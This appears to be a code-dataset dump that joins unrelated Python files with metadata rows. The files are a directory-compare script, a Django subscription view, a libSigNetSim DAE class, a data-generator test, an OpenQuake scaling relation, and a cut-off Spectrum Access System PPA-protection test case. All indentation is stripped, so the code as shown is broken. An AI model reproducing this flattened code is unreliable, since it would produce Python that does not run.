for item in dir1_list:
print(' {0}'.format(item))
else:
print(' None')
print('Files only in {0}'.format(dir2))
if dir2_list:
for item in dir2_list:
print(' {0}'.format(item))
else:
print(' None')
print('Matching files')
if yes_list:
for item in yes_list:
print(' {0}'.format(item))
else:
print(' None')
print('Mismatched files')
if no_list:
for item in no_list:
print(' {0}'.format(item))
else:
print(' None')
if global_result and (not no_print):
print(sbin.functions.pcolor('Directories ARE equal', 'green'))
elif (not global_result) and (not no_print):
print(sbin.functions.pcolor('Directories ARE NOT equal', 'red'))
sys.exit(1 if not global_result else 0)
if __name__ == '__main__':
PARSER = argparse.ArgumentParser(
description='Compare image directories'
)
PARSER.add_argument(
'-q', '--quiet',
help='suppress messages',
action="store_true",
default=False
)
PARSER.add_argument('dir1', help='First directory to compare', nargs=1)
PARSER.add_argument('dir2', help='Second directory to compare', nargs=1)
ARGS = PARSER.parse_args()
main(ARGS.quiet, ARGS.dir1[0], ARGS.dir2[0])
| mit | 1,650,487,592,812,506,000 | 29.125 | 76 | 0.582469 | false |
kmshi/miroguide | channelguide/subscriptions/views.py | 1 | 1962 | from django.conf import settings
from django.core.urlresolvers import resolve, Resolver404
from django.views.decorators.cache import never_cache
from django.http import HttpResponse
from django.shortcuts import get_object_or_404
from channelguide import util
from channelguide.channels.models import Channel
from channelguide.channels.views import channel as channel_view
from channelguide.guide.views.firsttime import index as firsttime_index
from channelguide.subscriptions.models import Subscription
@never_cache
def subscribe_hit(request, id):
"""Used by our ajax call handleSubscriptionLink. It will get a security
error if we redirect it to a URL outside the channelguide, so we don't do
that
"""
ids = [id] + [int(k) for k in request.GET]
for id in ids:
channel = get_object_or_404(Channel, pk=id)
referer = request.META.get('HTTP_REFERER', '')
ignore_for_recommendations = False
if referer.startswith(settings.BASE_URL_FULL):
referer = util.chop_prefix(referer, settings.BASE_URL_FULL)
if not referer.startswith("/"):
referer = '/' + referer # make sure it starts with a slash
try:
resolved = resolve(referer)
except Resolver404:
pass
else:
if resolved is not None:
func, args, kwargs = resolved
if func == channel_view and args[0] != id:
ignore_for_recommendations = True
elif func == firsttime_index:
ignore_for_recommendations = True
ip = request.META.get('REMOTE_ADDR', '0.0.0.0')
if ip == '127.0.0.1':
ip = request.META.get('HTTP_X_FORWARDED_FOR', '0.0.0.0')
Subscription.objects.add(
channel, ip,
ignore_for_recommendations=ignore_for_recommendations)
return HttpResponse("Hit successfull")
| agpl-3.0 | -7,790,385,285,968,047,000 | 40.744681 | 77 | 0.634557 | false |
vincent-noel/libSigNetSim | libsignetsim/model/math/DAE.py | 1 | 2339 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2014-2017 Vincent Noel ([email protected])
#
# This file is part of libSigNetSim.
#
# libSigNetSim is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# libSigNetSim is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with libSigNetSim. If not, see <http://www.gnu.org/licenses/>.
"""
This file defines the DAE class, which wraps one algebraic equation (definition == 0) of a model.
"""
from __future__ import print_function
from libsignetsim.model.math.MathFormula import MathFormula
from libsignetsim.model.math.sympy_shortcuts import SympySymbol, SympyEqual, SympyInteger
from sympy import solve, srepr, pretty
class DAE(object):
""" DAE class """
def __init__ (self, model):
""" Constructor of ode class """
self.__model = model
self.__definition = None
def new(self, definition):
self.__definition = definition
def getDefinition(self):
return self.__definition
def getFormula(self, rawFormula=True, developped=False):
if developped:
t_definition = self.__definition.getDeveloppedInternalMathFormula(rawFormula=rawFormula)
else:
t_definition = self.__definition.getInternalMathFormula(rawFormula=rawFormula)
return SympyEqual(
t_definition,
SympyInteger(0)
)
def __str__(self):
return "%s = 0" % str(self.__definition.getDeveloppedInternalMathFormula())
def pprint(self):
print(
pretty(
SympyEqual(
self.__definition.getDeveloppedInternalMathFormula(),
SympyInteger(0)
)
)
)
def solve(self):
to_solve = []
for var in self.__definition.getDeveloppedInternalMathFormula().atoms(SympySymbol):
variable = self.__model.listOfVariables.getBySymbol(var)
if variable is not None and variable.isAlgebraic():
to_solve.append(var)
return (to_solve[0], solve(self.__definition.getDeveloppedInternalMathFormula(), to_solve))
def isValid(self):
return self.__definition.getInternalMathFormula() != MathFormula.ZERO
| gpl-3.0 | 506,651,916,005,281,900 | 25.885057 | 93 | 0.730654 | false |
jocassid/PyDataGenerator | testDataGenerator.py | 1 | 2454 | #!/usr/bin/python3
import unittest
from DataGenerator import \
InMemoryDataSource, \
Person, \
Household
import locale
# View all available locales
# locale -a
#
# View current locale settings
# locale
#
# Add locale to system
# sudo locale-gen de_DE.utf8
# class TestDataSource(unittest.TestCase):
# pass
#
#
class TestInMemoryDataSource(unittest.TestCase):
def testStuff(self):
dataSource = InMemoryDataSource()
values = ['John', 'Robert', 'William', 'Andrew']
dataSource.loadDataItem('maleNames','en_us', values=values)
values = ['Elizabeth', 'Jennifer', 'Mary', 'Ann']
dataSource.loadDataItem('femaleNames', 'en_us', values=values)
values = ['Smith', 'Jones', 'Thomas', 'Davis']
dataSource.loadDataItem('lastNames', 'en_us', values=values)
person = Person(dataSource)
print(str(person))
for i in range(5):
family = Household(dataSource)
print(str(family))
# dataSource.loadDataItems(
# './locales',
# ['maleFirstNames'])
#
# personGenerator = dg.PersonGenerator(dataSource)
# for i in range(10):
# print(personGenerator.next(sex='M'))
# class TestSqliteDataSource(unittest.TestCase):
#
# def testStuff(self):
# dataSource = dg.SqliteDataSource()
# dataSource.open('./test.sqlite3')
# dataSource.loadDataItems(
# './locales',
# ['maleFirstNames'])
#
# personGenerator = dg.PersonGenerator(dataSource)
# for i in range(10):
# print(personGenerator.next(sex='M'))
#
# dataSource.close()
# class TestDataSource(unittest.TestCase):
#
# def testload_currentLocale(self):
# locale.setlocale(locale.LC_ALL, 'de_DE.utf8')
#
# # print(str(locale.localeconv()))
# # print(str(locale.getdefaultlocale()))
# #print(str(locale.getlocale()))
# dg.DATA_SOURCE.load(
# './locales',
# './data.sqlite',
# None,
# ['maleFirstNames'])
#
#
# class TestRandomFirstName(unittest.TestCase):
#
# def setUp(self):
# pass
#
# def testDefaultLocal(self):
# print(dg.randomFirstName(sex='M'))
if __name__ == '__main__':
unittest.main()
| mit | 8,514,053,047,799,457,000 | 23.54 | 70 | 0.55705 | false |
gem/oq-engine | openquake/hazardlib/scalerel/ceus2011.py | 1 | 1363 | # -*- coding: utf-8 -*-
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright (C) 2013-2021 GEM Foundation
#
# OpenQuake is free software: you can redistribute it and/or modify it
# under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# OpenQuake is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with OpenQuake. If not, see <http://www.gnu.org/licenses/>.
"""
Module :mod:`openquake.hazardlib.scalerel.ceus2011` implements
:class:`CEUS2011`.
"""
from openquake.hazardlib.scalerel.base import BaseMSR
class CEUS2011(BaseMSR):
"""
Magnitude-Scaling Relationship used for calculations in the CEUS SSC
project completed in 2011.
References:
- CEUS SSC Hazard Input Document - Appendix H, page H-3
- CEUS SSC Final Report - Chapter 5, page 5-57
"""
def get_median_area(self, mag, rake):
"""
Calculates median area as ``10 ** (mag - 4.366)``. Rake is ignored.
"""
return 10 ** (mag - 4.366)
| agpl-3.0 | 1,652,192,583,937,348,000 | 33.948718 | 75 | 0.702128 | false |
Wireless-Innovation-Forum/Spectrum-Access-System | src/harness/testcases/WINNF_FT_S_PPR_testcase.py | 1 | 30790 | # Copyright 2018 SAS Project Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import os
import logging
from concurrent.futures import ThreadPoolExecutor
import common_strings
from full_activity_dump_helper import getFullActivityDumpSasTestHarness, getFullActivityDumpSasUut
import sas
import sas_testcase
from sas_test_harness import SasTestHarnessServer, generateCbsdRecords, \
generatePpaRecords, generateCbsdReferenceId
import test_harness_objects
from util import winnforum_testcase, writeConfig, loadConfig, configurable_testcase, \
getRandomLatLongInPolygon, makePpaAndPalRecordsConsistent, \
addCbsdIdsToRequests, getCertFilename, getCertificateFingerprint, \
getFqdnLocalhost, getUnusedPort, json_load
from testcases.WINNF_FT_S_MCP_testcase import McpXprCommonTestcase
from reference_models.pre_iap_filtering import pre_iap_filtering
class PpaProtectionTestcase(McpXprCommonTestcase):
def setUp(self):
self._sas, self._sas_admin = sas.GetTestingSas()
self._sas_admin.Reset()
def tearDown(self):
self.ShutdownServers()
def generate_PPR_1_default_config(self, filename):
""" Generates the WinnForum configuration for PPR.1. """
# Load PPA record
ppa_record = json_load(
os.path.join('testcases', 'testdata', 'ppa_record_0.json'))
pal_record = json_load(
os.path.join('testcases', 'testdata', 'pal_record_0.json'))
pal_low_frequency = 3550000000
pal_high_frequency = 3560000000
ppa_record_1, pal_records_1 = makePpaAndPalRecordsConsistent(
ppa_record,
[pal_record],
pal_low_frequency,
pal_high_frequency,
'test_user_1'
)
# Load devices info
device_1 = json_load(
os.path.join('testcases', 'testdata', 'device_a.json'))
# Moving device_1 to a location within 40 KMs of PPA zone
device_1['installationParam']['latitude'] = 38.8203
device_1['installationParam']['longitude'] = -97.2741
device_2 = json_load(
os.path.join('testcases', 'testdata', 'device_b.json'))
# Moving device_2 to a location outside 40 KMs of PPA zone
device_2['installationParam']['latitude'] = 39.31476
device_2['installationParam']['longitude'] = -96.75139
device_3 = json_load(
os.path.join('testcases', 'testdata', 'device_c.json'))
# Moving device_3 to a location within PPA zone
device_3['installationParam']['latitude'], \
device_3['installationParam']['longitude'] = getRandomLatLongInPolygon(ppa_record_1)
device_4 = json_load(
os.path.join('testcases', 'testdata', 'device_d.json'))
# Moving device_4 to a location within PPA zone
device_4['installationParam']['latitude'], \
device_4['installationParam']['longitude'] = getRandomLatLongInPolygon(ppa_record_1)
# Load Grant requests
grant_request_1 = json_load(
os.path.join('testcases', 'testdata', 'grant_0.json'))
grant_request_1['operationParam']['operationFrequencyRange']['lowFrequency'] = 3550000000
grant_request_1['operationParam']['operationFrequencyRange']['highFrequency'] = 3560000000
grant_request_2 = json_load(
os.path.join('testcases', 'testdata', 'grant_1.json'))
grant_request_2['operationParam']['operationFrequencyRange']['lowFrequency'] = 3550000000
grant_request_2['operationParam']['operationFrequencyRange']['highFrequency'] = 3560000000
grant_request_3 = json_load(
os.path.join('testcases', 'testdata', 'grant_2.json'))
grant_request_3['operationParam']['operationFrequencyRange']['lowFrequency'] = 3550000000
grant_request_3['operationParam']['operationFrequencyRange']['highFrequency'] = 3560000000
grant_request_4 = json_load(
os.path.join('testcases', 'testdata', 'grant_0.json'))
grant_request_4['operationParam']['operationFrequencyRange']['lowFrequency'] = 3550000000
grant_request_4['operationParam']['operationFrequencyRange']['highFrequency'] = 3560000000
# device_b and device_d are Category B
# Load Conditional Data
self.assertEqual(device_2['cbsdCategory'], 'B')
conditionals_device_2 = {
'cbsdCategory': device_2['cbsdCategory'],
'fccId': device_2['fccId'],
'cbsdSerialNumber': device_2['cbsdSerialNumber'],
'airInterface': device_2['airInterface'],
'installationParam': device_2['installationParam'],
'measCapability': device_2['measCapability']
}
self.assertEqual(device_4['cbsdCategory'], 'B')
conditionals_device_4 = {
'cbsdCategory': device_4['cbsdCategory'],
'fccId': device_4['fccId'],
'cbsdSerialNumber': device_4['cbsdSerialNumber'],
'airInterface': device_4['airInterface'],
'installationParam': device_4['installationParam'],
'measCapability': device_4['measCapability']
}
# Remove conditionals from registration
del device_2['cbsdCategory']
del device_2['airInterface']
del device_2['installationParam']
del device_2['measCapability']
del device_4['cbsdCategory']
del device_4['airInterface']
del device_4['installationParam']
del device_4['measCapability']
# Registration and grant records
cbsd_records_domain_proxy_0 = {
'registrationRequests': [device_1, device_2],
'grantRequests': [grant_request_1, grant_request_2],
'conditionalRegistrationData': [conditionals_device_2]
}
cbsd_records_domain_proxy_1 = {
'registrationRequests': [device_3],
'grantRequests': [grant_request_3],
'conditionalRegistrationData': []
}
# Protected entity record
protected_entities = {
'palRecords': pal_records_1,
'ppaRecords': [ppa_record_1]
}
iteration_config = {
'cbsdRequestsWithDomainProxies': [cbsd_records_domain_proxy_0,
cbsd_records_domain_proxy_1],
'cbsdRecords': [{
'registrationRequest': device_4,
'grantRequest': grant_request_4,
'conditionalRegistrationData': conditionals_device_4,
'clientCert': getCertFilename('device_d.cert'),
'clientKey': getCertFilename('device_d.key')
}],
'protectedEntities': protected_entities,
'dpaActivationList': [],
'dpaDeactivationList': [],
'sasTestHarnessData': []
}
# Create the actual config.
config = {
'initialCbsdRequestsWithDomainProxies': self.getEmptyCbsdRequestsWithDomainProxies(2),
'initialCbsdRecords': [],
'iterationData': [iteration_config],
'sasTestHarnessConfigs': [],
'domainProxyConfigs': [{
'cert': getCertFilename('domain_proxy.cert'),
'key': getCertFilename('domain_proxy.key')
}, {
'cert': getCertFilename('domain_proxy_1.cert'),
'key': getCertFilename('domain_proxy_1.key')
}]
}
writeConfig(filename, config)
@configurable_testcase(generate_PPR_1_default_config)
def test_WINNF_FT_S_PPR_1(self, config_filename):
"""Single SAS PPA Protection
"""
config = loadConfig(config_filename)
# Invoke MCP test steps 1 through 22.
self.executeMcpTestSteps(config, 'xPR1')
def generate_PPR_2_default_config(self, filename):
""" Generates the WinnForum configuration for PPR.2. """
# Load PPA record
ppa_record = json_load(
os.path.join('testcases', 'testdata', 'ppa_record_0.json'))
pal_record = json_load(
os.path.join('testcases', 'testdata', 'pal_record_0.json'))
pal_low_frequency = 3550000000
pal_high_frequency = 3560000000
ppa_record_1, pal_records_1 = makePpaAndPalRecordsConsistent(
ppa_record,
[pal_record],
pal_low_frequency,
pal_high_frequency,
'test_user_1'
)
# Load devices info
device_1 = json_load(
os.path.join('testcases', 'testdata', 'device_a.json'))
# Moving device_1 to a location within 40 KMs of PPA zone
device_1['installationParam']['latitude'] = 38.8203
device_1['installationParam']['longitude'] = -97.2741
device_2 = json_load(
os.path.join('testcases', 'testdata', 'device_b.json'))
# Moving device_2 to a location outside 40 KMs of PPA zone
device_2['installationParam']['latitude'] = 39.31476
device_2['installationParam']['longitude'] = -96.75139
device_3 = json_load(
os.path.join('testcases', 'testdata', 'device_c.json'))
# Moving device_3 to a location within PPA zone
device_3['installationParam']['latitude'], \
device_3['installationParam']['longitude'] = getRandomLatLongInPolygon(ppa_record_1)
device_4 = json_load(
os.path.join('testcases', 'testdata', 'device_d.json'))
# Moving device_4 to a location within PPA zone
device_4['installationParam']['latitude'], \
device_4['installationParam']['longitude'] = getRandomLatLongInPolygon(ppa_record_1)
# Load Grant requests with overlapping frequency range for all devices
grant_request_1 = json_load(
os.path.join('testcases', 'testdata', 'grant_0.json'))
grant_request_1['operationParam']['operationFrequencyRange']['lowFrequency'] = 3550000000
grant_request_1['operationParam']['operationFrequencyRange']['highFrequency'] = 3560000000
grant_request_2 = json_load(
os.path.join('testcases', 'testdata', 'grant_1.json'))
grant_request_2['operationParam']['operationFrequencyRange']['lowFrequency'] = 3570000000
grant_request_2['operationParam']['operationFrequencyRange']['highFrequency'] = 3580000000
grant_request_3 = json_load(
os.path.join('testcases', 'testdata', 'grant_2.json'))
grant_request_3['operationParam']['operationFrequencyRange']['lowFrequency'] = 3590000000
grant_request_3['operationParam']['operationFrequencyRange']['highFrequency'] = 3600000000
grant_request_4 = json_load(
os.path.join('testcases', 'testdata', 'grant_0.json'))
grant_request_4['operationParam']['operationFrequencyRange']['lowFrequency'] = 3610000000
grant_request_4['operationParam']['operationFrequencyRange']['highFrequency'] = 3620000000
# device_b and device_d are Category B
# Load Conditional Data
self.assertEqual(device_2['cbsdCategory'], 'B')
conditionals_device_2 = {
'cbsdCategory': device_2['cbsdCategory'],
'fccId': device_2['fccId'],
'cbsdSerialNumber': device_2['cbsdSerialNumber'],
'airInterface': device_2['airInterface'],
'installationParam': device_2['installationParam'],
'measCapability': device_2['measCapability']
}
self.assertEqual(device_4['cbsdCategory'], 'B')
conditionals_device_4 = {
'cbsdCategory': device_4['cbsdCategory'],
'fccId': device_4['fccId'],
'cbsdSerialNumber': device_4['cbsdSerialNumber'],
'airInterface': device_4['airInterface'],
'installationParam': device_4['installationParam'],
'measCapability': device_4['measCapability']
}
# Remove conditionals from registration
del device_2['cbsdCategory']
del device_2['airInterface']
del device_2['installationParam']
del device_2['measCapability']
del device_4['cbsdCategory']
del device_4['airInterface']
del device_4['installationParam']
del device_4['measCapability']
# Registration and grant records
cbsd_records_domain_proxy_0 = {
'registrationRequests': [device_1, device_2],
'grantRequests': [grant_request_1, grant_request_2],
'conditionalRegistrationData': [conditionals_device_2]
}
cbsd_records_domain_proxy_1 = {
'registrationRequests': [device_3],
'grantRequests': [grant_request_3],
'conditionalRegistrationData': []
}
# Protected entity record
protected_entities = {
'palRecords': pal_records_1,
'ppaRecords': [ppa_record_1]
}
# SAS Test Harnesses configurations,
# Following configurations are for two SAS test harnesses
sas_test_harness_device_1 = json_load(
os.path.join('testcases', 'testdata', 'device_a.json'))
sas_test_harness_device_1['fccId'] = "test_fcc_id_e"
sas_test_harness_device_1['userId'] = "test_user_id_e"
sas_test_harness_device_2 = json_load(
os.path.join('testcases', 'testdata', 'device_b.json'))
sas_test_harness_device_2['fccId'] = "test_fcc_id_f"
sas_test_harness_device_2['userId'] = "test_user_id_f"
sas_test_harness_device_3 = json_load(
os.path.join('testcases', 'testdata', 'device_c.json'))
sas_test_harness_device_3['fccId'] = "test_fcc_id_g"
sas_test_harness_device_3['userId'] = "test_user_id_g"
# Generate Cbsd FAD Records for SAS Test Harness 0
cbsd_fad_records_sas_test_harness_0 = generateCbsdRecords(
[sas_test_harness_device_1],
[[grant_request_1]]
)
# Generate Cbsd FAD Records for SAS Test Harness 1
cbsd_fad_records_sas_test_harness_1 = generateCbsdRecords(
[sas_test_harness_device_2, sas_test_harness_device_3],
[[grant_request_2], [grant_request_3]]
)
# Generate SAS Test Harnesses dump records
dump_records_sas_test_harness_0 = {
'cbsdRecords': cbsd_fad_records_sas_test_harness_0
}
dump_records_sas_test_harness_1 = {
'cbsdRecords': cbsd_fad_records_sas_test_harness_1
}
# SAS Test Harnesses configuration
sas_test_harness_0_config = {
'sasTestHarnessName': 'SAS-TH-1',
'hostName': getFqdnLocalhost(),
'port': getUnusedPort(),
'serverCert': getCertFilename('sas.cert'),
'serverKey': getCertFilename('sas.key'),
'caCert': getCertFilename('ca.cert')
}
sas_test_harness_1_config = {
'sasTestHarnessName': 'SAS-TH-2',
'hostName': getFqdnLocalhost(),
'port': getUnusedPort(),
'serverCert': getCertFilename('sas_1.cert'),
'serverKey': getCertFilename('sas_1.key'),
'caCert': getCertFilename('ca.cert')
}
iteration_config = {
'cbsdRequestsWithDomainProxies': [cbsd_records_domain_proxy_0,
cbsd_records_domain_proxy_1],
'cbsdRecords': [{
'registrationRequest': device_4,
'grantRequest': grant_request_4,
'conditionalRegistrationData': conditionals_device_4,
'clientCert': getCertFilename('device_d.cert'),
'clientKey': getCertFilename('device_d.key')
}],
'protectedEntities': protected_entities,
'dpaActivationList': [],
'dpaDeactivationList': [],
'sasTestHarnessData': [dump_records_sas_test_harness_0,
dump_records_sas_test_harness_1]
}
# Create the actual config.
config = {
'initialCbsdRequestsWithDomainProxies': self.getEmptyCbsdRequestsWithDomainProxies(2),
'initialCbsdRecords': [],
'iterationData': [iteration_config],
'sasTestHarnessConfigs': [sas_test_harness_0_config,
sas_test_harness_1_config],
'domainProxyConfigs': [{
'cert': getCertFilename('domain_proxy.cert'),
'key': getCertFilename('domain_proxy.key')
}, {
'cert': getCertFilename('domain_proxy_1.cert'),
'key': getCertFilename('domain_proxy_1.key')}
]
}
writeConfig(filename, config)
@configurable_testcase(generate_PPR_2_default_config)
def test_WINNF_FT_S_PPR_2(self, config_filename):
"""Multiple SAS PPA Protection
"""
config = loadConfig(config_filename)
# Invoke MCP test steps 1 through 22.
self.executeMcpTestSteps(config, 'xPR2')
def generate_PPR_3_default_config(self, filename):
"""High-level description of the default config:
SAS UUT has devices B, D; all of which have a PAL grant.
SAS TH has devices A, C, E, all of which have a PAL grant.
SAS UUT has one PPA, with devices B and D on the cluster list.
SAS TH has one PPA, with devices A, C, and E on the cluster list.
The PPAs derive from different but adjacent PALs.
Both PPAs are on 3620-3630 MHz, as are all grants.
"""
# Load Devices
device_a = json_load(
os.path.join('testcases', 'testdata', 'device_a.json'))
device_a['installationParam']['latitude'] = 38.842176
device_a['installationParam']['longitude'] = -97.092863
device_b = json_load(
os.path.join('testcases', 'testdata', 'device_b.json'))
device_b['installationParam']['latitude'] = 38.845323113
device_b['installationParam']['longitude'] = -97.15514587
device_b['installationParam']['antennaBeamwidth'] = 0
device_b['installationParam']['antennaDowntilt'] = 0
device_c = json_load(
os.path.join('testcases', 'testdata', 'device_c.json'))
device_c['installationParam']['latitude'] = 38.816782
device_c['installationParam']['longitude'] = -97.102965
device_d = json_load(
os.path.join('testcases', 'testdata', 'device_d.json'))
device_d['installationParam']['latitude'] = 38.846125
device_d['installationParam']['longitude'] = -97.156184
device_d['installationParam']['antennaBeamwidth'] = 0
device_d['installationParam']['antennaDowntilt'] = 0
device_e = json_load(
os.path.join('testcases', 'testdata', 'device_e.json'))
device_e['installationParam']['latitude'] = 38.761748
device_e['installationParam']['longitude'] = -97.118459
# Pre-load conditionals and remove REG-conditional fields from registration
# requests.
conditional_keys = [
'cbsdCategory', 'fccId', 'cbsdSerialNumber', 'airInterface',
'installationParam', 'measCapability'
]
reg_conditional_keys = [
'cbsdCategory', 'airInterface', 'installationParam', 'measCapability'
]
conditionals_b = {key: device_b[key] for key in conditional_keys}
device_b = {
key: device_b[key]
for key in device_b
if key not in reg_conditional_keys
}
conditionals_d = {key: device_d[key] for key in conditional_keys}
device_d = {
key: device_d[key]
for key in device_d
if key not in reg_conditional_keys
}
# Load grant requests (default is 3620-3630).
grant_a = json_load(
os.path.join('testcases', 'testdata', 'grant_0.json'))
grant_b = json_load(
os.path.join('testcases', 'testdata', 'grant_0.json'))
grant_b['operationParam']['maxEirp'] = 30
grant_c = json_load(
os.path.join('testcases', 'testdata', 'grant_0.json'))
grant_d = json_load(
os.path.join('testcases', 'testdata', 'grant_0.json'))
grant_d['operationParam']['maxEirp'] = 30
grant_e = json_load(
os.path.join('testcases', 'testdata', 'grant_0.json'))
# CBSDs in SAS UUT.
domain_proxy = {
'registrationRequests': [device_b, device_d],
'grantRequests': [grant_b, grant_d],
'conditionalRegistrationData': [conditionals_b, conditionals_d],
'cert': getCertFilename('domain_proxy.cert'),
'key': getCertFilename('domain_proxy.key')
}
# One PPA in SAS UUT.
pal_low_frequency = 3620000000
pal_high_frequency = 3630000000
pal_record_0 = json_load(
os.path.join('testcases', 'testdata', 'pal_record_0.json'))
ppa_record_0 = json_load(
os.path.join('testcases', 'testdata', 'ppa_record_0.json'))
ppa_record_0['zone']['features'][0]['geometry']['coordinates'] = [[[
-97.155, 38.75
], [-97.155, 38.85], [-97.165, 38.85], [-97.165, 38.75], [-97.155, 38.75]]]
ppa_record_0, pal_records_0 = makePpaAndPalRecordsConsistent(
ppa_record_0, [pal_record_0], pal_low_frequency, pal_high_frequency,
'test_user_1')
device_b['userId'] = 'test_user_1'
device_d['userId'] = 'test_user_1'
ppa_cluster_list = [0, 1]
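    # Cluster list for the SAS UUT PPA: indices into the registration requests above (devices B and D).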
# One PPA in the peer SAS test harness.
pal_record_1 = json_load(
os.path.join('testcases', 'testdata', 'pal_record_1.json'))
pal_record_1['fipsCode'] = 20041084500
ppa_record_1 = json_load(
os.path.join('testcases', 'testdata', 'ppa_record_1.json'))
ppa_record_1['zone']['features'][0]['geometry']['coordinates'] = [[[
-97.145, 38.85
], [-97.145, 38.75], [-97.05, 38.75], [-97.05, 38.85], [-97.145, 38.85]]]
ppa_record_1, pal_records_1 = makePpaAndPalRecordsConsistent(
ppa_record_1, [pal_record_1], pal_low_frequency, pal_high_frequency,
'test_user_2')
# Generate FAD records.
cbsd_records = [device_a, device_c, device_e]
# Create CBSD reference IDs.
cbsd_reference_id_a = generateCbsdReferenceId(device_a['fccId'],
device_a['cbsdSerialNumber'])
cbsd_reference_id_c = generateCbsdReferenceId(device_c['fccId'],
device_c['cbsdSerialNumber'])
cbsd_reference_id_e = generateCbsdReferenceId(device_e['fccId'],
device_e['cbsdSerialNumber'])
cbsd_reference_ids = [[
cbsd_reference_id_a, cbsd_reference_id_c, cbsd_reference_id_e
]]
grant_record_list = [[grant_a], [grant_c], [grant_e]]
cbsd_records = generateCbsdRecords(cbsd_records, grant_record_list)
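    # Mark every grant in the peer SAS records as a PAL grant, matching the scenario described above.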
for cbsd in cbsd_records:
for grant in cbsd['grants']:
grant['channelType'] = 'PAL'
# Create records.
sas_harness_dump_records = {
'cbsdRecords': cbsd_records,
'ppaRecords': generatePpaRecords([ppa_record_1], cbsd_reference_ids),
}
# SAS test harness configuration.
sas_harness_config = {
'sasTestHarnessName': 'SAS-TH-1',
'hostName': getFqdnLocalhost(),
'port': getUnusedPort(),
'serverCert': getCertFilename('sas.cert'),
'serverKey': getCertFilename('sas.key'),
'caCert': 'certs/ca.cert'
}
config = {
'domainProxy':
domain_proxy, # Includes registration and grant requests.
'ppaRecord': ppa_record_0, # PPA in SAS UUT.
'ppaClusterList':
ppa_cluster_list, # Same format and semantics as SIQ.12.
'palRecords': [pal_records_0[0],
pal_records_1[0]], # PALs for both PPAs.
'sasTestHarnessDumpRecords':
sas_harness_dump_records, # CBSDs and one PPA.
'sasTestHarnessConfig':
sas_harness_config, # Just the config, no records.
}
writeConfig(filename, config)
@configurable_testcase(generate_PPR_3_default_config)
def test_WINNF_FT_S_PPR_3(self, config_filename):
config = loadConfig(config_filename)
# Light config checking.
self.assertValidConfig(
config, {
'domainProxy': dict,
'ppaRecord': dict,
'ppaClusterList': list,
'palRecords': list,
'sasTestHarnessDumpRecords': dict,
'sasTestHarnessConfig': dict
})
self.assertEqual(
len(config['sasTestHarnessDumpRecords']['ppaRecords']), 1,
'Only one PPA is supported.')
# Make sure ID formats are correct.
ppa = config['sasTestHarnessDumpRecords']['ppaRecords'][0]
self.assertGreater(
len(ppa['ppaInfo']['cbsdReferenceId']), 0,
'Must have at least one ID on the cluster list.')
for cbsd_ref_id in ppa['ppaInfo']['cbsdReferenceId']:
self.assertFalse(
cbsd_ref_id.startswith('cbsd/'),
'IDs in the cluster list should not start with "cbsd/".')
for cbsd in config['sasTestHarnessDumpRecords']['cbsdRecords']:
self.assertTrue(cbsd['id'].startswith('cbsd/'),
'IDs of individual CBSDs must start with "cbsd/".')
# Initialize test-wide variables, and state variables.
self.config = config
self.active_dpas = []
self.sas_test_harness_objects = []
self.domain_proxy_objects = []
self.protected_entity_records = {}
self.num_peer_sases = 1
self.cpas_executor = ThreadPoolExecutor(max_workers=1)
self.agg_interf_check_executor = ThreadPoolExecutor(max_workers=1)
self.sas_uut_fad = None
self.test_harness_fads = [] # List for consistency with MCP code.
self.all_dpa_checks_succeeded = True
# Notify SAS UUT that a peer SAS exists (and start the SAS server)
logging.info('Step 1: activate one SAS test harness and notify SAS UUT.')
test_harness = config['sasTestHarnessConfig']
logging.info('Creating SAS TH with config %s', test_harness)
# Initialize SAS Test Harness Server instance to dump FAD records
sas_test_harness_object = SasTestHarnessServer(
test_harness['sasTestHarnessName'], test_harness['hostName'],
test_harness['port'], test_harness['serverCert'],
test_harness['serverKey'], test_harness['caCert'])
self.InjectTestHarnessFccIds(
config['sasTestHarnessDumpRecords']['cbsdRecords'])
sas_test_harness_dump_records = [
config['sasTestHarnessDumpRecords']['cbsdRecords'],
config['sasTestHarnessDumpRecords']['ppaRecords']
]
sas_test_harness_object.writeFadRecords(sas_test_harness_dump_records)
# Start the server
sas_test_harness_object.start()
# Inform SAS UUT about SAS Test Harness.
certificate_hash = getCertificateFingerprint(test_harness['serverCert'])
self._sas_admin.InjectPeerSas({'certificateHash': certificate_hash,
'url': sas_test_harness_object.getBaseUrl()})
# Store required info in the test harness.
self.fad_cert = test_harness['serverCert']
self.fad_key = test_harness['serverKey']
self.sas_test_harness_objects.append(sas_test_harness_object)
# Extract PPA record from peer SAS and add to local protected entities.
peer_sas_ppa = config['sasTestHarnessDumpRecords']['ppaRecords'][0]
# The ID for each CBSD's record is of the format "cbsd/$REFERENCE_ID". The
# IDs on the cluster list are of the format "$REFERENCE_ID". Here we prepend
# "cbsd/" so that the values will be correctly matched in the zone purge
# reference model.
cluster_list = peer_sas_ppa['ppaInfo']['cbsdReferenceId']
for i in range(len(cluster_list)):
cluster_list[i] = 'cbsd/%s' % cluster_list[i]
self.protected_entity_records['ppaRecords'] = [peer_sas_ppa]
# Inject all PALs (used by SAS UUT PPA and peer SAS PPA)
logging.info('Step 2: inject PAL records.')
for index, pal_record in enumerate(config['palRecords']):
try:
logging.info('Injecting PAL record #%d', index)
self._sas_admin.InjectPalDatabaseRecord(pal_record)
except Exception:
logging.error(common_strings.CONFIG_ERROR_SUSPECTED)
